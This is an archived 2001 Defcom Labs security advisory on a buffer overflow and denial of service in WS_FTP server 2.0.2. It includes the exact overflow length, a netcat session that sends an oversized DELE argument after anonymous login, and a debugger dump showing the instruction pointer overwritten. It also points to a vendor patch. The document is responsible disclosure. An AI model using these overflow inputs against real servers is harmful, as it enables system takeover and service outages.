OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: andreas junestam (andreas.junestamdefcom.com)
Date: Thu Jul 26 2001 - 07:25:13 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ======================================================================
                      Defcom Labs Advisory def-2001-28

             WS_FTP server 2.0.2 Buffer Overflow and possible DOS

    Author: Andreas Junestam <andreasdefcom.com>
    Co-Author: Janne Sarendal <jannedefcom.com>
    Release Date: 2001-07-26
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    WS_FTP server 2.0.2 contains a buffer overflow which affects the
    following commands:
    * DELE
    * MDTM
    * MLST
    * MKD
    * RMD
    * RNFR
    * RNTO
    * SIZE
    * STAT
    * XMKD
    * XRMD
    This buffer overflow gives an attacker the ability to run code on
    the target with SYSTEM RIGHTS, due to the fact that the server runs
    as a service by default. OBS: This is only valid when logged in as
    an anonymous user, not an ordinary one.

    The server also contains a easy-to-trigger DOS.

    ------------------------=[Affected Systems]=--------------------------
    - WS_FTP server 2.0.2, havn't tested other versions

    ----------------------=[Detailed Description]=------------------------
    * Command Buffer Overrun
      All the above mentioned commands seems to be using the same parsing
      code which suffers from a buffer overflow. By sending a command with
      an argument greater than 478 (474 bytes + new return address) bytes,
      a buffer will overflow and the EIP will be overwritten. A
      proof-of-concept exploit is attached to the advisory, which works
      against WS_FTP server 2.0.2 running on WIN2K (Professional and
      Server, any SP).

      C:\tools\web>nc -nvv 127.0.0.1 21
      (UNKNOWN) [127.0.0.1] 21 (?) open
      220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      220-Tue Jun 19 14:00:21 2001
      220-30 days remaining on evaluation.
      220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      user ftp
      331 Password required
      pass ftp
      230 user logged in
      DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

      Access violation - code c0000005 (first chance)
      eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
      edi=77fca3e0
      eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
      na po nc
      cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
      efl=00010246

    * Possible DOS
      By sending a couple of NULL(0x0) characters, the WS_FTP Server
      will spike at 100% CPU.

    ---------------------------=[Workaround]=-----------------------------

    Download the new version from:
    http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

    -----------------------------=[Exploit]=------------------------------
    See attached file, ws_ftp.pl

    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the vendors attention on the 18th of
    June, 2001. Patch is released.

    ======================================================================
                This release was brought to you by Defcom Labs

                  labsdefcom.com www.defcom.com
    ======================================================================